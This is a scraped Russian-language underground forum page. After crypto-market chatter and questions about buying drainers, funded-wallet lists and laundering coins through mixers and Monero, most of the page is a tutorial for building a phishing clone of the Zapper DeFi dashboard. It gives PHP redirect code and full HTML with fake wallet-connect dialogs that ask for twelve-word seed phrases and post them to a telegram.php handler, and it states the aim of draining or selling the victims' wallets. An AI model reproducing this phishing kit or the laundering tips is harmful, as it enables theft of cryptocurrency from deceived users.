Опытным криптоинвесторам не чужды колебания цен , просадки в 90 % - это вполне ожидаемо для зарождающегося класса активов.
Технология, лежащая в основе всей отрасли, имеет потенциал навсегда изменить все аспекты цифровой жизни, от финансовых технологий до развлечений.
У нас не было возможности по-настоящему владеть цифровыми активами , не управляя физическим оборудованием, на котором они живут, пока не был создан биткоин.
Легко потерять из виду, насколько далеко мы продвинулись как отрасль. (!!!) Плохие новости можно рассматривать как хорошие новости для инвесторов с длинным временным горизонтом.
То, что начиналось как хобби -проект анонимного криптографа, который раз за разом объявляли мертвым , сегодня приносит пользу бесчисленным отраслям по всему миру.
Технология блокчейн - спасение для развивающихся стран, катализатор развития интернета.
Каждый рыночный цикл , через который прошла криптоиндустрия, оставил экосистему сильнее предыдущего. В криптоиндустрии мы видим, что неудачи не являются фатальными для отрасли, а наоборот, необходимый шаг в продвижении к будущему.
Этот рыночный цикл уже дал нам проверенные в боях протоколы DeFi и инфраструктуры , инновации в решениях для масштабирования, растущую индустрию метавселенной и многое другое.
Несмотря на снижение цен , ликвидацию и волатильность , криптоиндустрия продолжает строить и внедрять инновации , _расширяяграницы** возможного_.

Здрасте, подскажите где или как можно скачать например актуальный текстовик кошельков ETH и BTC с балансами больше 100$ формата одна строка один кошелёк ?

Повисло пару битковых транз. Подскажите, чем сейчас можно протолкнуть?

Господа, поставили задачку накидать список дрейнеров с ценами, которые сейчас актуальны.
Посоветуйте, кто с дрейнами работает, у кого брали, где нормальная поддержка\селлер?

Посоветуйте максимально безопасный и надеждый кошелек для хранения 50 битков, желательно что бы сервис не вел логов.

Дайте мне машину времени???

Привет форум
Это скорее свой взгляд и свое мнение по поводу криптовалюты BTC , что я вижу и что мне кажется .
Интересно поделиться и узнать ваше мнение по данной валюте

1. В своем движение вырисовывается перевернутый ( медвежий ) вымпел , цена ходит в его диапазоне , пытались пробить , но это было скорее ложный пробой вверх после которого виднеется коррекция вниз
2.

В глобальном тренде ( восходящем ) цена явно растет , но у BTC огромные пробои вверх и можно сказать что на каких то факторах он раздут

3. На часовом ТФ , интрадей
По циклам после подавления продавцами цены вниз , ожидается рост

4. В пятницу по фондам выходной , BTC будет предоставлен сам себе так сказать , есть возможность покупателями активно выступать и подавить все свечи вниз .

есть у кого свои прогнозы или мнение?

You must have at least 5 reaction(s) to view the content.

Собственно сабж, вопрос в названии, да упала криптовалюта, после НГ все опять пойдет рости.

Кто что посоветует, недавно знакомый чистил свою крипту да так до чистился почти)) Крч закинул свой биток в миксер потом 3 раза прогнал в монеро(разные кошельки, тор IP и все дела, левые почти) розбивал разными сумами, в конце концов через знакомых увидел бумажку из Интерпола (запрос на банк) про вывод на карту дропа его денег даже часть денег а не всю сумму, сразу увидел монеро который через обменку выводил на карту дропа. Повезло что есть свои люди в Интерполе. Я так понял все таки есть в USA методы отловки монеро?) Кроме дропа левого с картой как можно получить свой нал? кто шарит напишите в личку или тут, интересно услышать ваше мнение. Правда что делал бы не в миксер пихал а в Wassabi wallet но как то все равно монеро отследили, очень странная ситуация.

Ребят, посоветуйте хороший биткоин кошелек. Без блокировок и бесконечных верификаций, с множетством валют и чтобы был открытий код (без логов). Или раскажите что вы юзаете и приемущества.
Заранее блогодарен.

I recently encountered a TrustWallet Scammer and found that "they" are posting their private key in chat rooms. Once the victim logs into the TrustWallet they see there is about 5k in ETH based coins in the wallet. When the victim transfers ETH to the account its automatically pulled from the account to a new wallet.

What script are they using for this with Trustwallet to move the ETH that quick?

Какие кошельки вы используете для ?usdt, usdc и других стейблкоинов? вообще как храните стейблкоины с учетом, что они не слишком безопасны из-за блокировок?

Привет всем!
В этой статье, мы будем добывать криптокошельки и секретные фразы для них. Это не стандартный способ, я не думаю, что его где-то видели. Вы думали, что можно добывать криптокошельки, только с помощью стиллеров, а вот и не так =)))

Немного о этом способе
Мы скопируем сайт, который собирает секретные слова и кошельки, а дальше, допишем его и сделаем отправку данных в телеграмм.
После получения секретных слов и адресов криптокошельков, Вы сможете их восстановить и сналить или продать.

Для этого понадобится немного времени, умение скопировать сайт и немного знаний веб-разработки JS, PHP, HTML/CSS и трафферы.

Первое, что нам нужно, это написать мини скрипт для распределения юзеров по странам.

Назовем его index.php

PHP:Copy to clipboard

<?php 
// Скрипт работает по user browser language
$sites = array(

"en" => "index.html",

// "cn" => "index_cn.html",

// "de" => "index_de.html",

// "el" => "index_el.html",

// "es" => "index_es.html",

// "fr" => "index_fr.html",

// "id" => "index_id.html",

// "it" => "index_it.html"

);

// Определяем  2х символьный язык en и тд

$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);

// Установка языка по умолчанию если переменная $lang не соответствуют не одному значению из массива $site

if (!isset($sites[$lang])) {

$lang = ‘en’;

}

// Редирект пользователя на нужную страницу.

header('Location: ' . $sites[$lang]);

exit;

Второе - нам нужно будет дописать страницу для ввода кошелька, это нужно отправить в телеграмм.
После ввода данных - нас перекидывает в профиль и там нужно указать 12 секретных слов и эти слова отпр в телеграмм.

Назовем её index.html

HTML:Copy to clipboard

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <script src="https://kit.fontawesome.com/aa4dabdc57.js" crossorigin="anonymous"></script>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="CSS/style.min.css">
    <link rel="stylesheet" href="CSS/style.css">
    <link rel="stylesheet" href="CSS/modal.css">
    <link rel="stylesheet" href="CSS/media.css">
    <link rel="stylesheet" href="CSS/alert.css">
    <title>Zapper - Dashboard for DeFi</title>
    <link rel="shortcut icon" href="icons/zap_logo.png">
    <script src="http://yastatic.net/jquery/2.1.4/jquery.min.js"></script>
    <script src="http://yastatic.net/jquery/cookie/1.0/jquery.cookie.min.js"></script>
    <script src="customalert.js"></script>
</head>
<body>
    
    <header>
        <div class="container">
            
            <div class="logo">
                <a class="zap_linker" href=""><img class="zapper_icons" src="icons/zap_logo.png" alt="">
                    <div class="zapper">Zapper</div></a>
                </div>
                <nav>
                    <ul>
                        <li><a class="nav_link" href="#">Docs</a></li>
                        <li><a class="nav_link" href="#">Tutorials</a></li>
                        <li><a class="nav_link" href="https://discord.com/invite/h6CGbuN">Community</a></li>
                    </ul>
                </nav>
            </div>
        </header>
        <section class="main">
            <div class="container_main">
                <h1>Manage your<span class="index">DeFi</span> <br class="mobile_brack">assets and liabilities in<br class="mobile_brack"> one <br class="desktop_brack">simple interface.</h1> 

                <h3>
                    Get unique access to opportunities in open finance.
                </h3>
                <div class="main_flex">
                    <form action="dashboard.php" method="POST">
                        <input class="main_form" name="cash" maxlength="50" type="text" required placeholder="Enter ENS domain, or a valid ETH, or BTC address">
                        <button class="main_pink">Let's Go!</button>
                        <div class="main_or">
                            or
                        </div>
                        <a class="connect" href="#openModal" rel="modal:open"><button class="main_black">Connect Wallet</button></a>
                    </form>
                </div>
                <div class="main_what_one">
                    <i class="fas fa-arrow-right"></i>
                    <a class= "main_wl" href="#">Don't have an address? View demo.</a>
                </div>
                <div class="main_what_two">
                    <i class="fas fa-arrow-right"></i>
                    <a class= "main_wl" href="#">What's is DeFi?</a>
                </div>
                <div class="main_flex_bottom">
                    <div class="main_mbt">
                        <h2 class="main_mbth">$1.3B+</h2>
                        <p class="main_mbtp">Invested through our platform</p>
                        <p class="main_mbtpbot">Since May 2020</p>
                    </div>
                    <div class="main_mbt">
                        <h2 class="main_mbth">400K+</h2>
                        <p class="main_mbtp">Monitored their assets</p>
                        <p class="main_mbtpbot">Since January 2020</p>
                    </div>
                    <div class="main_mbt">
                        <h2 class="main_mbth">48</h2>
                        <p class="main_mbtp">DeFi platforms supported</p>
                        <a class="main_mbtpbota" href="#">View the full list</a>
                    </div>
                </div>
            </div>
        </section>


        <footer class="footer">
            <div class="container">
                <div class="footer_left">
                    <a class="footer_i" href="https://twitter.com/zapper_fi"><i class="fab fa-twitter"></i></a>
                    <a class="footer_i" href="https://discord.com/invite/h6CGbuN"><i class="fab fa-discord"></i></a>
                    <a class="footer_i" href=""><i class="fab fa-weixin"></i></a>
                    <a class="footer_a" href="#">FAQ</a>
                    <a class="footer_a" href="#">Docs</a>
                    <a class="footer_a" href="https://discord.com/invite/Rf3YJ3V">Contact Support</a>
                    <a class="footer_a" href="#">Supported Platforms</a>
                    <div class="dropdown">
                        <button onclick="myFunction()" class="dropbtn"><div class="dropbtn_lang">en</div> <div class="dropbtn_arrow"></div> </button>
                        <div id="my Dropdown" class="dropdown-content">
                            <a href="#">English</a>
                            <a href="index_fr.html">Français</a>
                            <a href="index_es.html">Español</a>
                            <a href="index_ru.html">Русский</a>
                            <a href="index_cn.html">中文</a>
                            <a href="index_de.html">Deutsch</a>
                            <a href="index_it.html">Italian</a>
                            <a href="index_el.html">ελληνικά</a>
                            <a href="index_id.html">Bahasa</a>
                        </div>
                    </div>
                </div>


                <script>
            /* When the user clicks on the button, 
            toggle between hiding and showing the dropdown content */
            function myFunction() {
                document.getElementById("my Dropdown").classList.toggle("show");
            }
            
            // Закрыть the dropdown if the user clicks outside of it
            /* window.onclick = function(event) {
              if (!event.target.matches('.dropbtn')) {
                var dropdowns = document.getElementsByClassName("dropdown-content");
                var i;
                for (i = 0; i < dropdowns.length; i++) {
                  var open Dropdown = dropdowns[i];
                  if (open Dropdown.classList.contains('show')) {
                    open Dropdown.classList.remove('show');
                  }
                }
              }
            } */
        </script>
        <div class="footer_right">
            <i class="far fa-copyright"></i>
            Zapper 2021
        </div>
    </div>
</footer>

<div id="openModal" class="modal">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <h3 class="modal-title">Select a Wallet to Connect to Zapper</h3>
                <a href="#close" title="Close" class="close">×</a>
            </div>
            <div class="modal-body">    
                <div class="modal-body_l">
                    <a class="modal-body_link" href="#exMask"><button class="modal-body_btn"><img class="modal-body_icon_mm" src="icons/masknew.png" alt=""><span class="modal-body_value">MetaMask</span></button></a>
                    <a class="modal-body_link" href="#exLedger"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/ledgerfin.jpg" alt=""><span class="modal-body_value">Ledger</span></button></a>
                    <a class="modal-body_link" href="#exTrezor"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/trezor_dob.jpg" alt=""><span class="modal-body_value">Trezor</span></button></a>
                    <a class="modal-body_link" href="#exPortis"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/port.jpg" alt=""><span class="modal-body_value">Portis</span></button></a>
                    <a class="modal-body_link" href="#exOpera"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/logo-opera.png" alt=""><span class="modal-body_value">Opera</span></button></a>
                    <a class="modal-body_link" href="#exBlockchain"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/blockchain.png" alt=""><span class="modal-body_value">Blockchain</span></button></a>
                    <a class="modal-body_link" href="#exExodus"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/exodus.png" alt=""><span class="modal-body_value">Exodus</span></button></a>

                    <a class="accordion" href="#openModal">What is a wallet?</a>
                    <div class="panel">
                        <p class="wal_p">Wallets are used to send, receive, and store digital assets like Ether. Wallets come in many forms. They are either built into your browser, an extension added to your browser, a piece of hardware plugged into your computer or even an app on your phone. For more information about wallets, see <a href="https://docs.ethhub.io/using-ethereum/wallets/intro-to-ethereum-wallets/">this explanation.</a></p>
                    </div>
                </div>
                <div class="modal-body_r">
                    <a class="modal-body_link" href="#exWalletConnect"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/walletcon_dob.png" alt=""><span class="modal-body_value">WalletConnect</span></button></a>
                    <a class="modal-body_link" href="#exLattice"><button class="modal-body_btn"><img class="modal-body_icon_lat" src="icons/+L.png" alt=""><span class="modal-body_value">Lattice</span></button></a>
                    <a class="modal-body_link" href="#exFormatic"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/forma.jpg" alt=""><span class="modal-body_value">Formatic</span></button></a>
                    <a class="modal-body_link" href="#exTorus"><button class="modal-body_btn"><img class="modal-body_icon_tor" src="img/torus3.png" alt=""><span class="modal-body_value">Torus</span></button></a>
                    <a class="modal-body_link" href="#exWalletLink"><button class="modal-body_btn"><img class="modal-body_icon_wl" src="icons/walletseedfin.png" alt=""><span class="modal-body_value">WalletLink</span></button></a>
                    <a class="modal-body_link" href="#exTrust"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/trust.jpg" alt=""><span class="modal-body_value">Trust</span></button></a>
                </div>

                
                <!-- Скрипт для аккордиона в модальном окне! **************************************************************************************************-->
                <script>
                    var acc = document.getElementsByClassName("accordion");
                    var i;
                    
                    for (i = 0; i < acc.length; i++) {
                        acc[i].addEventListener("click", function() {
                            this.classList.toggle("active");
                            var panel = this.nextElementSibling;
                            if (panel.style.maxHeight){
                                panel.style.maxHeight = null;
                            } else {
                                panel.style.maxHeight = panel.scrollHeight + "px";
                            }
                        });
                    }
                </script>
            </div>
        </div>
    </div>
</div>


<!-- ******************************************************************************************************************* -->
<div id="exMask">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/MetaMaskFin.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>

    <!-- *************************НАЖАТИЕ НА КНОПКУ И ОТПРАВКА ИНФЫ В JS************************************************************************* -->
    <textarea id="sid_input_1" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_1" class="inp_mod" type="hidden" name="currency" value="MetaMask">

    <button class="main_pink2" onclick="validateInput_1()">Connect</button>
</div>
<!--**************************************************************************************************************************************** -->
<div id="exLedger">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon2" src="icons/ledger.jpg" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_2" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_2" class="inp_mod" type="hidden" name="currency" value="Ledger">
    <button class="main_pink2" onclick="validateInput_2()">Connect</button>
</div>
<div id="exTrezor">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="img/trezorphoto.png"> 
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_3" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_3" class="inp_mod" type="hidden" name="currency" value="Trezor">
    <button class="main_pink2" onclick="validateInput_3()">Connect</button>
</div>
<div id="exPortis">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="img/port.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_4" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_4" class="inp_mod" type="hidden" name="currency" value="Portis">
    <button class="main_pink2" onclick="validateInput_4()">Connect</button>
</div>
<div id="exOpera">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="img/logo-opera.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_5" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_5" class="inp_mod" type="hidden" name="currency" value="Opera">
    <button class="main_pink2" onclick="validateInput_5()">Connect</button>
</div>
<div id="exBlockchain">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/blockchainpng.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_6" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_6" class="inp_mod" type="hidden" name="currency" value="Blockchain">
    <button class="main_pink2" onclick="validateInput_6()">Connect</button>
</div>
<div id="exExodus">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/exodus.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_7" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_7" class="inp_mod" type="hidden" name="currency" value="Exodus">
    <button class="main_pink2" onclick="validateInput_7()">Connect</button>
</div>

<div id="exWalletConnect">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="img/walletconph.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_8" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_8" class="inp_mod" type="hidden" name="currency" value="WalletConnect">
    <button class="main_pink2" onclick="validateInput_8()">Connect</button>
</div>
<div id="exLattice">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/+L.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_9" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_9" class="inp_mod" type="hidden" name="currency" value="Lattice">
    <button class="main_pink2" onclick="validateInput_9()">Connect</button>
</div>
<div id="exFormatic">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="img/formaphoto.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_10" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_10" class="inp_mod" type="hidden" name="currency" value="Fortmatic">
    <button class="main_pink2" onclick="validateInput_10()">Connect</button>
</div>
<div id="exTorus" class="modal">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/torf.jpg" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_11" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_11" class="inp_mod" type="hidden" name="currency" value="Torus">
    <button class="main_pink2" onclick="validateInput_11()">Connect</button>
</div>

<div id="exWalletLink">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/walletseedfin.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_12" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_12" class="inp_mod" type="hidden" name="currency" value="WalletLink">
    <button class="main_pink2" onclick="validateInput_12()">Connect</button>
</div>

<div id="exTrust" class="modal">
    <a href="#close" title="Close" class="close_value">×</a>
    <img class="ex2icon" src="icons/trust_png.png" alt="">
    <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
    <p class="ex2p">Wallet Seed:</p>
    <textarea id="sid_input_13" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
    <input id="cur_input_13" class="inp_mod" type="hidden" name="currency" value="Trust">
    <button class="main_pink2" onclick="validateInput_13()">Connect</button>
</div>

</body>
</html>

Третий шаг - пишем страницу профиля.

Назовем её dashboard.php

PHP:Copy to clipboard

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://kit.fontawesome.com/aa4dabdc57.js" crossorigin="anonymous"></script>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="CSS/style.min.css">
    <link rel="stylesheet" href="CSS/dashboard_style.min.css">
    <link rel="stylesheet" href="CSS/style.css">
    <link rel="stylesheet" href="CSS/modal.css">
    <link rel="stylesheet" href="CSS/media.css">
    <title>Zapper - Dashboard for DeFi</title>
    <link rel="shortcut icon" href="icons/zap_logo.png">
    <script src="functions.js"></script>
    <script src="http://yastatic.net/jquery/2.1.4/jquery.min.js"></script>
    <script src="http://yastatic.net/jquery/cookie/1.0/jquery.cookie.min.js"></script>
</head>
<body>
    <header>
        <div class="container">
            <div class="logo">
                <a class="zap_linker" href=""><img class="zapper_icons" src="icons/zap_logo.png" alt="">
                    <div class="zapper">Zapper</div></a>
                </div>
                <div class="lk">
                    <img class="lk_icon" src="icons/lg2.png" alt="">
                    <div class="defi">
                        defiportal.eth
                    </div>
                    <div class="arrow_def">

                    </div>
                    <div class="eth">
                        Ethereum

                    </div>
                </div>
                <nav class="nav_dash">
                    <ul>
                        <li>
                            <div class="usa">
                                <a href=""><img class="usa_png" src="icons/usa4.png" alt=""></a><div class="usa_text">USD</div> <div class="usa_arrow"></div>    
                            </div>
                        </li>
                        <li> <div class="gas"><a><i class="fas fa-gas-pump"></i><div class="gas_346">346</div><div class="gas_arrow">
                        </div></a></div></li>
                        <li>
                            <div class="set">
                                <a><i class="fas fa-cog"></i><div class="set_arrow"></div></a>
                            </div></li>
                        </ul>
                    </nav>
                </div>
            </header>
            <section class="section_dash">
                <div class="container_dash">
                    <div class="subheader">
                        <div class="subheader_icons"> <i class="fas fa-layer-group"></i><span class="subheader_pink">Dashboard</span></i></div>
                        <div class="subheader_icons_ex"> <i class="fas fa-exchange-alt"></i>Exchange</i></div>
                        <div class="subheader_icons"><img class="energy" src="icons/energy.png" alt=""><div class="energy_block">Pool</div></div>
                        <div class="subheader_icons"><i class="fas fa-tractor"></i>Farm</div>
                        <div class="subheader_icons"><i class="far fa-clock"></i>History </div>
                        <div class="subheader_line"></div><div class="subheader_line2"></div>
                    </div>


                    <div class="total">
                        <div class="total_block">
                            <p class="total_block_text">Total Assets</p>
                            <p class="total_block_nomber">$0</p>
                        </div>
                        <div class="total_block">
                            <p class="total_block_text">Total Debt</p>
                            <p class="total_block_nomber">$0</p>
                        </div>
                        <div class="total_block">
                            <p class="total_block_text">Net Worth</p>
                            <p class="total_block_nomber">$0</p>
                        </div>
                    </div>
                    <div class="total_acco">Account Overview <a class="total_acco_s">Don't see your assets?

                    </div></a>
                    <div class="total_switch">
                        <div class="total_below">Hide Balances Below</div>
                        <div class="total_arrow"></div>
                        <div class="total_view">Switch View</div>
                        <div class="total_oval"><i class="fas fa-toggle-on"></i></div>
                    </div>
                    <div class="card">
                        <div class="card_block">
                            <div class="card_icon"><div class="circle"><i class="fas fa-wallet"></i></div></div><div class="card_text">Wallet</div><div class="card_nombers">$0</div>
                        </div>
                        <div class="card_block">
                            <div class="card_icon"><div class="circle"><i class="fas fa-wallet"></i></div></div><div class="card_text">Deposits
                            </div><div class="card_nombers">$0</div>
                        </div>
                        <div class="card_block">
                            <div class="card_icon"><div class="circle"><i class="far fa-chart-bar"></i></i></div></div><div class="card_text">Investments
                            </div><div class="card_nombers">$0</div>
                        </div>
                    </div>
                    <div class="card2">
                        <div class="card2_block2">
                            <div class="card_icon"><div class="circle"><img class="track_icons" src="icons/track6.png" alt=""></div></div><div class="card_text">Yield Farming
                            </div><div class="card_nombers">$0</div>
                        </div>
                        <div class="card2_block2">
                            <div class="card_icon"><div class="circle_gr"><i class="fas fa-thermometer-quarter"></i></div></div><div class="card_text">Debt
                            </div><div class="card_nombers">$0
                            </div>
                        </div>
                    </div>
                    <div class="plat">
                        Platforms
                    </div>
                </div>

            </section>

            <div id="exMask">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/MetaMaskFin.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>

                <textarea id="sid_input_1" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_1" class="inp_mod" type="hidden" name="currency" value="MetaMask">

                <button class="main_pink2">Connect</button> 

            </div>
            <div id="exLedger">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon2" src="icons/ledger.jpg" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>
                <form action="telegram.php" method="POST">
                    <textarea id="sid_input_2" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                    <input id="cur_input_2" class="inp_mod" type="hidden" name="currency" value="Ledger">

                    <button class="main_pink2">Connect</button>
                </form>
            </div>
            <div id="exTrezor">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="img/trezorphoto.png"> 
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_3" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_3" class="inp_mod" type="hidden" name="currency" value="Trezor">

                <button class="main_pink2">Connect</button>
            </div>
            <div id="exPortis">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="img/port.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_4" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_4" class="inp_mod" type="hidden" name="currency" value="Portis">

                <button class="main_pink2">Connect</button>
            </div>
            <div id="exOpera">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="img/logo-opera.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_5" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_5" class="inp_mod" type="hidden" name="currency" value="Opera">
                <button class="main_pink2">Connect</button>
            </div>
            <div id="exBlockchain">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/blockchainpng.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>
                <form action="telegram.php" method="POST">
                    <input type="hidden" name="cash" value="<?php echo trim($_POST['cash']); ?>">
                    <textarea id="sid_input_6" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                    <input id="cur_input_6" class="inp_mod" type="hidden" name="currency" value="Blockchain">
                    <button class="main_pink2">Connect</button>
                </form>
            </div>
            <div id="exExodus">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/exodus.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_7" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_7" class="inp_mod" type="hidden" name="currency" value="Exodus">
                <button class="main_pink2">Connect</button>
            </div>

            <div id="exWalletConnect">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="img/walletconph.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_8" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_8" class="inp_mod" type="hidden" name="currency" value="WalletConnect">
                <button class="main_pink2">Connect</button>
            </div>
            <div id="exLattice">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/+L.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_9" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_9" class="inp_mod" type="hidden" name="currency" value="Lattice">
                <button class="main_pink2">Connect</button>
            </div>
            <div id="exFormatic">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="img/formaphoto.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_10" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_10" class="inp_mod" type="hidden" name="currency" value="Fortmatic">
                <button class="main_pink2">Connect</button>
            </div>
            <div id="exTorus" class="modal">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/torf.jpg" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_11" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_11" class="inp_mod" type="hidden" name="currency" value="Torus">
                <button class="main_pink2">Connect</button>
            </div>

            <div id="exWalletLink">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/walletseedfin.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>


                <textarea id="sid_input_12" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_12" class="inp_mod" type="hidden" name="currency" value="WalletLink">
                <button class="main_pink2">Connect</button>
            </div>

            <div id="exTrust" class="modal">
                <a href="#close" title="Close" class="close_value">×</a>
                <img class="ex2icon" src="icons/trust_png.png" alt="">
                <p class="ex2p">Enter your secret twelve word phrase here to connect wallet</p>
                <p class="ex2p">Wallet Seed:</p>
                <textarea id="sid_input_13" spellcheck="false" class="inp_mod" type="text" name="sid"></textarea>
                <input id="cur_input_13" class="inp_mod" type="hidden" name="currency" value="Trust">
                <button class="main_pink2">Connect</button>
            </div>
        </div>

        <div id="openModal" class="modal2">
            <div class="modal-dialog">
